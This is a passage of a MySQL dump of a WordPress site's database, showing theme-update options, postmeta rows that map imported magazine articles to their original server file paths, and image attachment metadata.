wentytwenty\";a:6:{s:5:\"theme\";s:12:\"twentytwenty\";s:11:\"new_version\";s:3:\"1.8\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.1.8.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:15:\"twentytwentyone\";a:6:{s:5:\"theme\";s:15:\"twentytwentyone\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.1.4.zip\";s:8:\"requires\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";}}s:12:\"translations\";a:0:{}}','no'),(117159,'_transient_doing_cron','1649199838.5357789993286132812500','yes');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=2290 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (42,33,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/10/october-2011.html'),(43,34,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/10/pensions.html'),(44,35,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/10/perfect-partners.html'),(46,37,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/10/rise-of-the-machines.html'),(47,38,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/10/something_s-brewing.html'),(48,39,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/10/thinkers-and-drinkers.html'),(50,41,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/11/a-gift-that-is-priceless.html'),(51,42,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/11/a-new-lease-of-life.html'),(52,43,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/11/a-place-you-can-aspire-to-retire-in.html'),(53,44,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/11/adding-growth-to-your-pension.html'),(54,45,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/11/chew-with-confidence.html'),(55,46,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/11/november-issue.html'),(57,48,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/11/stash-in-the-attic.html'),(58,49,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/11/still-living-life-to-the-full.html'),(59,50,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/11/the-gift-of-companionship.html'),(60,51,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/11/the-price-of-peace-of-mind.html'),(61,52,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/11/your-festive-cheer-starts-here.html'),(62,53,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/a-splash-of-magic.html'),(63,54,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/an-appointment-with-excellence.html'),(64,55,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/an-eye-for-tradition.html'),(65,56,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/bringing-history-to-life.html'),(66,57,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/merry-glow-of-times-past.html'),(67,58,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/modern-classics-wear-well.html'),(68,59,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/pump-up-the-pomp.html'),(71,62,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/queen-among-accolades.html'),(72,63,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/restore-renew-revive.html'),(73,64,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/royal-warrants.html'),(74,65,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/seal-of-approval.html'),(75,66,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/tea-for-one.html'),(76,67,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/the-key-to-success.html'),(77,68,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/12/trade-and-tradition.html'),(78,69,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/are-you-sold-on-gold.html'),(79,70,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/from-the-silver-screen-to-the-street.html'),(81,72,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/handle-with-care.html'),(82,73,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/hunter-davies.html'),(84,75,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/lets-talk-about-cancer.html'),(85,76,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/letter-from-the-editor.html'),(86,77,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/priceless-history.html'),(87,78,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/say-goodbye-to-blighty.html'),(88,79,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/see-it-to-believe-it.html'),(89,80,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/the-near-perfect-asset.html'),(90,81,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/travel-insurance-you-could-bank-on-2.html'),(91,82,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/why-settle-for-anything-less.html'),(92,83,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/a-ray-of-hope-for-your-eyesight.html'),(93,84,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/a-right-royal-souvenir.html'),(94,85,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/a-sight-without-sore-eyes.html'),(95,86,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/buying-a-home-in-the-spanish-sun.html'),(96,87,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/dont-forget-the-small-print.html'),(98,89,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/get-a-taste-of-fine-investment.html'),(99,90,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/get-up-and-go-march.html'),(100,91,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/getting-a-real-deal.html'),(101,92,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/glorious-stirring-sight.html'),(103,94,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/i-couldnt-live-without-a-photo-of-my-dad.html'),(104,95,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/it-pays-to-secure-an-exchange-rate.html'),(105,96,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/letter-from-the-editor-2.html'),(106,97,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/safe-as-houses.html'),(107,98,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/senior-moment.html'),(109,100,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/the-near-perfect-asset-2.html'),(110,101,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/this-life-cherie-lunghi.html'),(111,102,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/welcome-to-oldagia.html'),(112,103,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/x-marks-the-spot.html'),(115,61,'_customize_restore_dismissed','1'),(116,105,'_edit_lock','1522697121:1'),(117,104,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/a-gift-from-the-gods.html'),(119,107,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/a-powerful-way-to-invest.html'),(120,108,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/back-to-the-drawing-board-george.html'),(122,110,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/cool-calm-and-collected.html'),(123,111,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/drinking-until-you-drop.html'),(124,112,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/feathering-their-nests.html'),(125,113,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/focusing-on-beating-glaucoma.html'),(126,114,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/get-up-and-go-april.html'),(127,115,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/get-up-and-go-may.html'),(129,117,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/have-something-to-smile-about.html'),(130,118,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/how-can-you-nip-intruders-in-the-bud.html'),(131,119,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/i-couldnt-live-without-a-portrait-of-my-father.html'),(132,120,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/i-couldnt-live-without-my-egg-timer.html'),(133,121,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/im-a-very-lucky-man.html'),(134,122,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/just-call-me-beatrix-potter.html'),(135,123,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/kind-to-your-family-kind-to-the-environment.html'),(136,124,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/managing-arthritis-the-natural-way.html'),(137,125,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/money-talks.html'),(138,126,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/out-about.html'),(139,127,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/prepare-for-the-known.html'),(141,129,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/senior-moment-2.html'),(142,130,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/spotting-the-signs.html'),(145,131,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/sunshine-state-beckons.html'),(146,133,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/the-family-that-laughs-together.html'),(147,134,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/the-gift-of-sight.html'),(148,135,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/this-life-celia-imrie.html'),(149,136,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/this-life-wilbur-smith.html'),(150,137,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/who-needs-to-be-first-at-everything.html'),(153,138,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/why-youth-wants-words-from-the-wise.html'),(154,140,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/a-bit-of-all-white.html'),(155,141,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/a-matter-of-taste.html'),(157,143,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/bite-into-a-birthday.html'),(158,144,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/get-up-and-go-sandwich-special.html'),(159,145,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/in-for-the-fill.html'),(160,146,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/in-honor-of-older-americans-month-happy-80th-birthday-mom.html'),(161,147,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/labelled-with-love.html'),(162,148,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/our-daily-bread.html'),(163,149,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/packing-a-punch.html'),(164,150,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/roll-on-another-250-years.html'),(166,152,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/world-on-a-plate.html'),(169,153,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/bibliophiles-corner-curbcheck-by-zach-fortier.html'),(170,155,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/bibliophiles-corner-trade-winds-to-meluhha-by-vasant-dave.html'),(171,156,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/create-a-legacy-that-grows.html'),(173,158,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/hunt-with-highest-calibre.html'),(174,159,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/page/2.html'),(175,160,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/page/3.html'),(177,162,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/residence-of-royalty.html'),(178,163,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/review-the-artist-of-disappearance-by-anita-desai.html'),(179,164,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/royal-warrants-2.html'),(181,166,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/tailored-by-tradition.html'),(182,167,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/this-life-lesley-garrett.html'),(183,168,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/06/time-to-take-control.html'),(184,169,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/bibliophiles-corner-the-earthquake-machine-by-mary-pauline-lowry.html'),(185,170,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/diamonds-jewel-purpose.html'),(186,171,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/get-up-and-go-july.html'),(187,172,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/history-of-love.html'),(188,173,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/i-couldnt-live-withoutmy-faithful-filofax.html'),(189,174,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/its-official-we-are-living-longer.html'),(190,176,'_edit_lock','1522697275:1'),(191,175,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/its-time-to-update-the-care-system.html'),(192,177,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/key-to-the-future.html'),(194,179,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/media-watch-2.html'),(195,180,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/money-talks-2.html'),(196,181,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/out-of-the-woods.html'),(197,182,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/own-your-future.html'),(199,184,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/the-joys-of-being-a-couch-potato.html'),(200,185,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/the-king-of-swing.html'),(201,186,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/the-sporting-spirit.html'),(203,188,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/to-boldly-go-where-no-man-has-gone-before.html'),(204,189,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/vive-la-difference-men-women.html'),(207,190,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/what-is-this-thing-called-love.html'),(209,192,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/add-flavor-to-your-recipe-repertoire-2.html'),(210,193,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/be-still-my-beating-heart.html'),(211,194,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/bringing-history-to-life-2.html'),(212,195,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/building-a-bright-future.html'),(213,196,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/festive-friends.html'),(214,198,'_edit_lock','1522697287:1'),(215,197,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/get-up-and-go-august.html'),(216,199,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/getting-to-know-you.html'),(217,200,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/into-the-wild-2.html'),(218,201,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/its-good-to-talk-2.html'),(219,202,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/ive-always-been-naughty-making-people-laugh-is-a-very-powerful-?thing-to-do-2.html'),(220,203,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/lacking-energy-get-a-vitamin-b-boost.html'),(223,205,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/love-or-lust-at-first-sight.html'),(224,206,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/own-your-future-3.html'),(225,207,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/planning-pays-off.html'),(226,208,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/putting-the-fun-into-fitness-2.html'),(227,209,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/shes-reading-it-are-you.html'),(228,210,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/societys-ethical-dilemma.html'),(229,211,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/the-best-of-both-worlds-2.html'),(231,213,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/09/love-is-a-drug.html'),(232,214,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/09/love-thy-neighbour.html'),(233,215,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/12/comfort-independence-and-security.html'),(234,216,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/12/companionship-at-christmas.html'),(235,217,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/12/get-up-and-go-december.html'),(236,218,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/12/own-your-future-2.html'),(237,219,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/12/the-best-of-both-worlds.html'),(239,221,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/get-up-go-march.html'),(240,222,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/how-my-fathers-death-showed-me-i-was-not-as-ruthless-as-i-thought.html'),(241,223,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/how-rufus-the-dog-puts-marathon-pair-through-paces.html'),(242,224,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/im-certain-that-golf-is-the-best-game-in-the-world-to-be-bad-at.html'),(243,225,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/interview-herbie-kretzmer-les-miserables-scriptwriter.html'),(244,226,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/lincoln-a-story-of-struggle-sacrifice-and-some-success.html'),(257,61,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/10/thinkers-and-drinkers.html'),(258,75,'_wp_attached_file','2018/04/architecture-old-building_4460x4460.jpg'),(259,75,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4460;s:6:\"height\";i:2973;s:4:\"file\";s:47:\"2018/04/architecture-old-building_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"architecture-old-building_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"architecture-old-building_4460x4460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"architecture-old-building_4460x4460-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"architecture-old-building_4460x4460-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:47:\"architecture-old-building_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:47:\"architecture-old-building_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(262,82,'_wp_attached_file','2018/04/arctic-grasslands_4460x4460.jpg'),(263,82,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4460;s:6:\"height\";i:2973;s:4:\"file\";s:39:\"2018/04/arctic-grasslands_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"arctic-grasslands_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"arctic-grasslands_4460x4460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"arctic-grasslands_4460x4460-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"arctic-grasslands_4460x4460-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:39:\"arctic-grasslands_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:39:\"arctic-grasslands_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 6D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1506867326\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(264,86,'_wp_attached_file','2018/04/arizona-natural-landscape_4460x4460.jpg'),(265,86,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4460;s:6:\"height\";i:2973;s:4:\"file\";s:47:\"2018/04/arizona-natural-landscape_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"arizona-natural-landscape_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"arizona-natural-landscape_4460x4460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"arizona-natural-landscape_4460x4460-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"arizona-natural-landscape_4460x4460-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:47:\"arizona-natural-landscape_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:47:\"arizona-natural-landscape_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"ILCE-6000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1460926658\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(266,89,'_wp_attached_file','2018/04/arm-back-muscles_4460x4460.jpg'),(267,89,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4460;s:6:\"height\";i:2975;s:4:\"file\";s:38:\"2018/04/arm-back-muscles_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"arm-back-muscles_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"arm-back-muscles_4460x4460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"arm-back-muscles_4460x4460-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"arm-back-muscles_4460x4460-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:38:\"arm-back-muscles_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:38:\"arm-back-muscles_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";